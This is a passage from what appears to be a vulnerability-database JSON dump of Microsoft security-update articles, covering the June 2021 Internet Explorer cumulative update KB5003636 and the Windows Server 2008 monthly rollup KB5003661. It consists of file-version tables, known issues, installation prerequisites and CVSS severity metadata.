11.0.9600.20038| 17-May-2021| 21:57| 168,960 \nicrav03.rat| Not versioned| 8-Apr-2021| 17:55| 8,798 \nticrf.rat| Not versioned| 8-Apr-2021| 17:55| 1,988 \niertutil.dll| 11.0.9600.20038| 17-May-2021| 22:19| 2,308,608 \nsqmapi.dll| 6.2.9200.16384| 20-May-2021| 15:38| 228,232 \ninseng.dll| 11.0.9600.20038| 17-May-2021| 21:59| 91,136 \nVGX.dll| 11.0.9600.20038| 17-May-2021| 21:56| 818,176 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 2,066,432 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:38| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 2,121,216 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 2,075,136 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 2,063,872 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 2,314,240 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 2,390,528 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 2,033,152 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 2,307,584 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 2,255,872 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 2,061,312 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 2,326,016 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 2,019,840 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 2,071,040 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 2,082,816 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 2,307,584 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 2,170,368 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 2,153,984 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 2,291,712 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 2,283,520 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 2,052,096 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 2,301,952 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 2,093,056 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 2,075,648 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 2,299,392 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 2,094,592 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 2,316,800 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 2,305,536 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 2,278,912 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 2,277,888 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 3,584 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 2,060,288 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 2,315,776 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 2,278,912 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 2,324,992 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 2,098,176 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 1,890,304 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 3,072 \nieframe.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 1,890,304 \nieui.dll.mui| 11.0.9600.20038| 20-May-2021| 16:07| 3,072 \nieinstal.exe| 11.0.9600.20038| 17-May-2021| 21:55| 475,648 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 29,184 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:39| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:40| 32,768 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:41| 33,280 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:42| 35,328 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 37,888 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 17:13| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:43| 34,304 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:44| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:45| 33,280 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:46| 34,304 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:47| 27,648 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:48| 34,304 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:49| 33,792 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:50| 23,040 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:51| 22,016 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:52| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:53| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:54| 31,232 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:55| 34,304 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 35,840 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:56| 32,768 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:57| 33,280 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:58| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 15:59| 34,816 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 33,280 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:00| 32,256 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:01| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:02| 32,768 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:03| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:04| 30,720 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:05| 29,696 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 16,384 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:06| 16,896 \njscript9.dll.mui| 11.0.9600.20038| 20-May-2021| 16:08| 16,896 \n \n### Windows Server 2008\n\n### \n\n__\n\nInternet Explorer 9 on all supported x86-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21561| 20-May-2021| 15:36| 1,141,760 \niexplore.exe| 9.0.8112.21561| 20-May-2021| 15:47| 751,528 \ninetcpl.cpl| 9.0.8112.21561| 20-May-2021| 15:35| 1,427,968 \nwininet.dll| 9.0.8112.21561| 20-May-2021| 15:36| 1,132,544 \njsproxy.dll| 9.0.8112.21561| 20-May-2021| 15:34| 75,776 \nWininetPlugin.dll| 1.0.0.1| 20-May-2021| 15:34| 66,048 \ntdc.ocx| 9.0.8112.21561| 20-May-2021| 15:34| 63,488 \niedvtool.dll| 9.0.8112.21561| 20-May-2021| 15:35| 678,912 \ndxtmsft.dll| 9.0.8112.21561| 20-May-2021| 15:34| 354,304 \ndxtrans.dll| 9.0.8112.21561| 20-May-2021| 15:34| 223,744 \nmsfeeds.dll| 9.0.8112.21561| 20-May-2021| 15:34| 607,744 \nmsfeeds.mof| Not versioned| 20-May-2021| 15:09| 1,518 \nmsfeedsbs.mof| Not versioned| 20-May-2021| 15:09| 1,574 \nmsfeedsbs.dll| 9.0.8112.21561| 20-May-2021| 15:34| 41,472 \nmsfeedssync.exe| 9.0.8112.21561| 20-May-2021| 15:34| 10,752 \nmshta.exe| 9.0.8112.21561| 20-May-2021| 15:34| 11,776 \nhtml.iec| 2019.0.0.21557| 20-May-2021| 15:38| 367,616 \nmshtmled.dll| 9.0.8112.21561| 20-May-2021| 15:34| 72,704 \nmshtml.dll| 9.0.8112.21561| 20-May-2021| 15:43| 12,844,544 \nmshtml.tlb| 9.0.8112.21561| 20-May-2021| 15:34| 2,382,848 \nielowutil.exe| 9.0.8112.21561| 20-May-2021| 15:34| 223,232 \nieproxy.dll| 9.0.8112.21561| 20-May-2021| 15:34| 195,072 \nIEShims.dll| 9.0.8112.21561| 20-May-2021| 15:34| 194,560 \nExtExport.exe| 9.0.8112.21561| 20-May-2021| 15:35| 22,528 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21561| 20-May-2021| 15:34| 142,848 \njsdbgui.dll| 9.0.8112.21561| 20-May-2021| 15:35| 388,096 \niertutil.dll| 9.0.8112.21561| 20-May-2021| 15:35| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 20-May-2021| 15:47| 142,744 \nVGX.dll| 9.0.8112.21561| 20-May-2021| 15:35| 769,024 \nurl.dll| 9.0.8112.21561| 20-May-2021| 15:34| 231,936 \nieframe.dll| 9.0.8112.21561| 20-May-2021| 15:38| 9,757,696 \nieui.dll| 9.0.8112.21561| 20-May-2021| 15:32| 176,640 \nieinstal.exe| 9.0.8112.21561| 20-May-2021| 15:34| 474,624 \nInetRes.adml| Not versioned| 20-May-2021| 15:51| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21561| 20-May-2021| 15:35| 104,448 \njscript.dll| 5.8.7601.21557| 20-May-2021| 15:34| 723,456 \njscript9.dll| 9.0.8112.21561| 20-May-2021| 15:42| 1,819,648 \nvbscript.dll| 5.8.7601.21557| 20-May-2021| 15:35| 434,176 \n \n### \n\n__\n\nInternet Explorer 9 on all supported x64-based versions\n\n**File name**| **File version**| **Date**| **Time**| **File size** \n---|---|---|---|--- \nurlmon.dll| 9.0.8112.21561| 20-May-2021| 16:28| 1,390,592 \niexplore.exe| 9.0.8112.21561| 20-May-2021| 16:50| 757,672 \ninetcpl.cpl| 9.0.8112.21561| 20-May-2021| 16:26| 1,494,528 \nwininet.dll| 9.0.8112.21561| 20-May-2021| 16:28| 1,395,200 \njsproxy.dll| 9.0.8112.21561| 20-May-2021| 16:26| 97,280 \nWininetPlugin.dll| 1.0.0.1| 20-May-2021| 16:26| 86,528 \ntdc.ocx| 9.0.8112.21561| 20-May-2021| 16:25| 76,800 \niedvtool.dll| 9.0.8112.21561| 20-May-2021| 16:27| 887,808 \ndxtmsft.dll| 9.0.8112.21561| 20-May-2021| 16:26| 452,608 \ndxtrans.dll| 9.0.8112.21561| 20-May-2021| 16:26| 281,600 \nmsfeeds.dll| 9.0.8112.21561| 20-May-2021| 16:26| 729,088 \nmsfeeds.mof| Not versioned| 20-May-2021| 16:00| 1,518 \nmsfeedsbs.mof| Not versioned| 20-May-2021| 16:00| 1,574 \nmsfeedsbs.dll| 9.0.8112.21561| 20-May-2021| 16:26| 55,296 \nmsfeedssync.exe| 9.0.8112.21561| 20-May-2021| 16:26| 11,264 \nmshta.exe| 9.0.8112.21561| 20-May-2021| 16:25| 12,800 \nhtml.iec| 2019.0.0.21557| 20-May-2021| 16:35| 448,512 \nmshtmled.dll| 9.0.8112.21561| 20-May-2021| 16:26| 96,256 \nmshtml.dll| 9.0.8112.21561| 20-May-2021| 16:45| 18,811,392 \nmshtml.tlb| 9.0.8112.21561| 20-May-2021| 16:26| 2,382,848 \nielowutil.exe| 9.0.8112.21561| 20-May-2021| 16:26| 223,744 \nieproxy.dll| 9.0.8112.21561| 20-May-2021| 16:26| 550,912 \nIEShims.dll| 9.0.8112.21561| 20-May-2021| 16:26| 305,664 \nWindows Pop-up Blocked.wav| Not versioned| 27-Apr-2018| 10:11| 85,548 \nWindows Information Bar.wav| Not versioned| 27-Apr-2018| 10:11| 23,308 \nWindows Feed Discovered.wav| Not versioned| 27-Apr-2018| 10:11| 19,884 \nWindows Navigation Start.wav| Not versioned| 27-Apr-2018| 10:11| 11,340 \nieUnatt.exe| 9.0.8112.21561| 20-May-2021| 16:26| 173,568 \njsdbgui.dll| 9.0.8112.21561| 20-May-2021| 16:27| 499,712 \niertutil.dll| 9.0.8112.21561| 20-May-2021| 16:26| 2,163,200 \nsqmapi.dll| 6.0.6000.16386| 20-May-2021| 16:50| 176,040 \nVGX.dll| 9.0.8112.21561| 20-May-2021| 16:27| 997,376 \nurl.dll| 9.0.8112.21561| 20-May-2021| 16:26| 237,056 \nieframe.dll| 9.0.8112.21561| 20-May-2021| 16:31| 10,944,000 \nieui.dll| 9.0.8112.21561| 20-May-2021| 16:23| 248,320 \nieinstal.exe| 9.0.8112.21561| 20-May-2021| 16:26| 490,496 \nInetRes.adml| Not versioned| 20-May-2021| 16:54| 393,813 \ninetres.admx| Not versioned| 27-Apr-2018| 10:14| 1,601,204 \njsdebuggeride.dll| 9.0.8112.21561| 20-May-2021| 16:27| 141,312 \njscript.dll| 5.8.7601.21557| 20-May-2021| 16:26| 818,176 \njscript9.dll| 9.0.8112.21561| 20-May-2021| 16:34| 2,358,784 \nvbscript.dll| 5.8.7601.21557| 20-May-2021| 16:26| 583,680 \niexplore.exe| 9.0.8112.21561| 20-May-2021| 15:47| 751,528 \nieUnatt.exe| 9.0.8112.21561| 20-May-2021| 15:34| 142,848 \nurlmon.dll| 9.0.8112.21561| 20-May-2021| 15:36| 1,141,760 \ninetcpl.cpl| 9.0.8112.21561| 20-May-2021| 15:35| 1,427,968 \nwininet.dll| 9.0.8112.21561| 20-May-2021| 15:36| 1,132,544 \njsproxy.dll| 9.0.8112.21561| 20-May-2021| 15:34| 75,776 \nWininetPlugin.dll| 1.0.0.1| 20-May-2021| 15:34| 66,048 \ntdc.ocx| 9.0.8112.21561| 20-May-2021| 15:34| 63,488 \niedvtool.dll| 9.0.8112.21561| 20-May-2021| 15:35| 678,912 \ndxtmsft.dll| 9.0.8112.21561| 20-May-2021| 15:34| 354,304 \ndxtrans.dll| 9.0.8112.21561| 20-May-2021| 15:34| 223,744 \nmsfeeds.dll| 9.0.8112.21561| 20-May-2021| 15:34| 607,744 \nmsfeeds.mof| Not versioned| 20-May-2021| 15:09| 1,518 \nmsfeedsbs.mof| Not versioned| 20-May-2021| 15:09| 1,574 \nmsfeedsbs.dll| 9.0.8112.21561| 20-May-2021| 15:34| 41,472 \nmsfeedssync.exe| 9.0.8112.21561| 20-May-2021| 15:34| 10,752 \nmshta.exe| 9.0.8112.21561| 20-May-2021| 15:34| 11,776 \nhtml.iec| 2019.0.0.21557| 20-May-2021| 15:38| 367,616 \nmshtmled.dll| 9.0.8112.21561| 20-May-2021| 15:34| 72,704 \nmshtml.dll| 9.0.8112.21561| 20-May-2021| 15:43| 12,844,544 \nmshtml.tlb| 9.0.8112.21561| 20-May-2021| 15:34| 2,382,848 \nielowutil.exe| 9.0.8112.21561| 20-May-2021| 15:34| 223,232 \nieproxy.dll| 9.0.8112.21561| 20-May-2021| 15:34| 195,072 \nIEShims.dll| 9.0.8112.21561| 20-May-2021| 15:34| 194,560 \nExtExport.exe| 9.0.8112.21561| 20-May-2021| 15:35| 22,528 \njsdbgui.dll| 9.0.8112.21561| 20-May-2021| 15:35| 388,096 \niertutil.dll| 9.0.8112.21561| 20-May-2021| 15:35| 1,808,384 \nsqmapi.dll| 6.0.6000.16386| 20-May-2021| 15:47| 142,744 \nVGX.dll| 9.0.8112.21561| 20-May-2021| 15:35| 769,024 \nurl.dll| 9.0.8112.21561| 20-May-2021| 15:34| 231,936 \nieframe.dll| 9.0.8112.21561| 20-May-2021| 15:38| 9,757,696 \nieui.dll| 9.0.8112.21561| 20-May-2021| 15:32| 176,640 \nieinstal.exe| 9.0.8112.21561| 20-May-2021| 15:34| 474,624 \njsdebuggeride.dll| 9.0.8112.21561| 20-May-2021| 15:35| 104,448 \njscript.dll| 5.8.7601.21557| 20-May-2021| 15:34| 723,456 \njscript9.dll| 9.0.8112.21561| 20-May-2021| 15:42| 1,819,648 \nvbscript.dll| 5.8.7601.21557| 20-May-2021| 15:35| 434,176 \n \n## **Information about protection and security**\n\n * Protect yourself online: [Windows Security support](<https://support.microsoft.com/hub/4099151/windows-security-help>)\n * Learn how we guard against cyber threats: [Microsoft Security](<https://www.microsoft.com/security>)\n\n## **References**\n\nLearn about the [terminology](<https://support.microsoft.com/help/824684>) that Microsoft uses to describe software updates.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "KB5003636: Cumulative security update for Internet Explorer: June 8, 2021", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31959", "CVE-2021-31971", "CVE-2021-33742"], "modified": "2021-06-08T00:00:00", "id": "KB5003636", "href": "https://support.microsoft.com/en-us/help/5003636", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-11-28T09:54:24", "description": "None\n**Important: **Windows Server 2008 Service Pack 2 (SP2) has reached the end of mainstream support and is now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nVerify that** **you have installed the required updates listed in the **How to get this update** section before installing this update. \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows Server 2008 Service Pack 2 update history [home page](<https://support.microsoft.com/help/4343218>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003210](<https://support.microsoft.com/help/5003210>) (released May 11, 2021) and addresses the following issues:\n\n * Security updates to Windows App Platform and Frameworks, Windows Cloud Infrastructure, Windows Authentication, Windows Fundamentals, Windows Storage and Filesystems, Windows HTML Platform, and Microsoft Scripting Engine.\nFor more information about the resolved security vulnerabilities, please refer to the new [Security Update Guide](<https://msrc.microsoft.com/update-guide>) website.\n\n## **Known issues in this update**\n\n**Symptom**| **Workaround** \n---|--- \nAfter installing this or later updates, apps accessing event logs on remote devices might be unable to connect. This issue might occur if the local or remote has not yet installed updates released June 8, 2021 or later. Affected apps are using certain [legacy Event Logging APIs](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Feventlog%2Fevent-logging-reference&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=scGcVremyws4XgZOCym3Xy2QHLHOkKMjyKzcTLfe41g%3D&reserved=0>). You might receive an error when attempting to connect, for example:\n\n * Error 5: access is denied\n * Error 1764: The requested operation is not supported.\n * System.InvalidOperationException,Microsoft.PowerShell.Commands.GetEventLogCommand\n * Windows has not provided an error code.\n**Note** Event Viewer and other apps using current non-legacy APIs to access event logs should not be affected.| This is expected due to security hardening changes relating to [Event Tracing for Windows (ETW)](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fdocs.microsoft.com%2Fwindows%2Fwin32%2Fetw%2Fevent-tracing-portal&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358267404%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=%2FgfaPm5%2BCISkiVtxX4404eQqQw7laVw1ivdUp7zQujQ%3D&reserved=0>) for [CVE-2021-31958](<https://nam06.safelinks.protection.outlook.com/?url=https%3A%2F%2Fmsrc.microsoft.com%2Fupdate-guide%2Fvulnerability%2FCVE-2021-31958&data=04%7C01%7Cv-throbe%40microsoft.com%7C68b7649c7b67404a68e608d92b9e1d56%7C72f988bf86f141af91ab2d7cd011db47%7C1%7C0%7C637588780358277372%7CUnknown%7CTWFpbGZsb3d8eyJWIjoiMC4wLjAwMDAiLCJQIjoiV2luMzIiLCJBTiI6Ik1haWwiLCJXVCI6Mn0%3D%7C1000&sdata=KZm29KU3UwieblYgHzatlQXbNEqI9KChC0rR4c3fZaU%3D&reserved=0>). This issue is resolved if the local and remote devices both have installed updates released June 8, 2021 or later. \nAfter installing this update or later updates, connections to SQL Server 2005 might fail. You might receive an error, \"Cannot connect to &lt;Server name&gt;, Additional information: A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server was not found or was not accessible. Verify that the instance name is correct and that SQL Server is configured to allow remote connections. (provider: Named Pipes Provider, error: 40 - Could not open a connection to SQL Server) (.Net SqlClient Data Provider)\"| This is expected behavior due to a security hardening change in this update. To resolve this issue, you will need to update to a [supported version of SQL Server](<https://docs.microsoft.com/en-us/lifecycle/products/?terms=sql%20server>). \nAfter installing this update and restarting your device, you might receive the error, \u201cFailure to configure Windows updates. Reverting Changes. Do not turn off your computer\u201d, and the update might show as **Failed** in **Update History**.| This is expected in the following circumstances:\n\n * If you are installing this update on a device that is running an edition that is not supported for ESU. For a complete list of which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).\n * If you do not have an ESU MAK add-on key installed and activated.\nIf you have purchased an ESU key and have encountered this issue, please verify you have applied all prerequisites and that your key is activated. For information on activation, please see this [blog](<https://aka.ms/Windows7ESU>) post. For information on the prerequisites, see the \"How to get this update\" section of this article. \nCertain operations, such as **rename**, that you perform on files or folders that are on a Cluster Shared Volume (CSV) may fail with the error, \u201cSTATUS_BAD_IMPERSONATION_LEVEL (0xC00000A5)\u201d. This occurs when you perform the operation on a CSV owner node from a process that doesn\u2019t have administrator privilege.| Do one of the following:\n\n * Perform the operation from a process that has administrator privilege.\n * Perform the operation from a node that doesn\u2019t have CSV ownership.\nMicrosoft is working on a resolution and will provide an update in an upcoming release. \n \n## **How to get this update**\n\n**Before installing this update****IMPORTANT** Customers who have purchased the Extended Security Update (ESU) for on-premises versions of these operating systems must follow the procedures in [KB4522133](<https://support.microsoft.com/help/4522133>) to continue receiving security updates after extended support ends on January 14, 2020.For more information about ESU and which editions are supported, see [KB4497181](<https://support.microsoft.com/help/4497181>).**Prerequisite:**You must install the updates listed below and **restart your device** before installing the latest Rollup. Installing these updates improves the reliability of the update process and mitigates potential issues while installing the Rollup and applying Microsoft security fixes.\n\n 1. The April 9, 2019 servicing stack update (SSU) ([KB4493730](<https://support.microsoft.com/help/4493730>)). To get the standalone package for this SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). This update is required to install updates that are only SHA-2 signed.\n 2. The latest SHA-2 update ([KB4474419](<https://support.microsoft.com/help/4474419>)) released October 8, 2019. If you are using Windows Update, the latest SHA-2 update will be offered to you automatically. This update is required to install updates that are only SHA-2 signed. For more information on SHA-2 updates, see [2019 SHA-2 Code Signing Support requirement for Windows and WSUS](<https://support.microsoft.com/help/4472027>).\n 3. The Extended Security Updates (ESU) Licensing Preparation Package ([KB4538484](<https://support.microsoft.com/help/4538484>)) or the Update for the Extended Security Updates (ESU) Licensing Preparation Package ([KB4575904](<https://support.microsoft.com/help/4575904>)). The ESU licensing preparation package will be offered to you from WSUS. To get the standalone package for ESU licensing preparation package, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>).\nAfter installing the items above, Microsoft strongly recommends that you install the latest SSU ([KB4580971](<https://support.microsoft.com/help/4580971>)). If you are using Windows Update, the latest SSU will be offered to you automatically if you are an ESU customer. To get the standalone package for the latest SSU, search for it in the [Microsoft Update Catalog](<http://www.catalog.update.microsoft.com/home.aspx>). For general information about SSUs, see [Servicing stack updates](<https://docs.microsoft.com/en-us/windows/deployment/update/servicing-stack-updates>) and [Servicing Stack Updates (SSU): Frequently Asked Questions](<https://support.microsoft.com/help/4535697>).**Install this update****Release Channel**| **Available**| **Next Step** \n---|---|--- \nWindows Update and Microsoft Update| Yes| None. This update will be downloaded and installed automatically from Windows Update if you are an ESU customer. \nMicrosoft Update Catalog| Yes| To get the standalone package for this update, go to the [Microsoft Update Catalog](<https://www.catalog.update.microsoft.com/Search.aspx?q=KB5003661>) website. \nWindows Server Update Services (WSUS)| Yes| This update will automatically sync with WSUS if you configure **Products and Classifications** as follows:**Product**: Windows Server 2008 Service Pack 2**Classification**: Security Updates \n \n## **File information**\n\nFor a list of the files that are provided in this update, download the [file information for update 5003661](<https://download.microsoft.com/download/c/d/4/cd4543b0-7473-4d61-b0c6-47f73bfae4b9/5003661.csv>).\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "LOW", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.4, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.5}, "published": "2021-06-08T00:00:00", "type": "mskb", "title": "June 8, 2021\u2014KB5003661 (Monthly Rollup)", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", 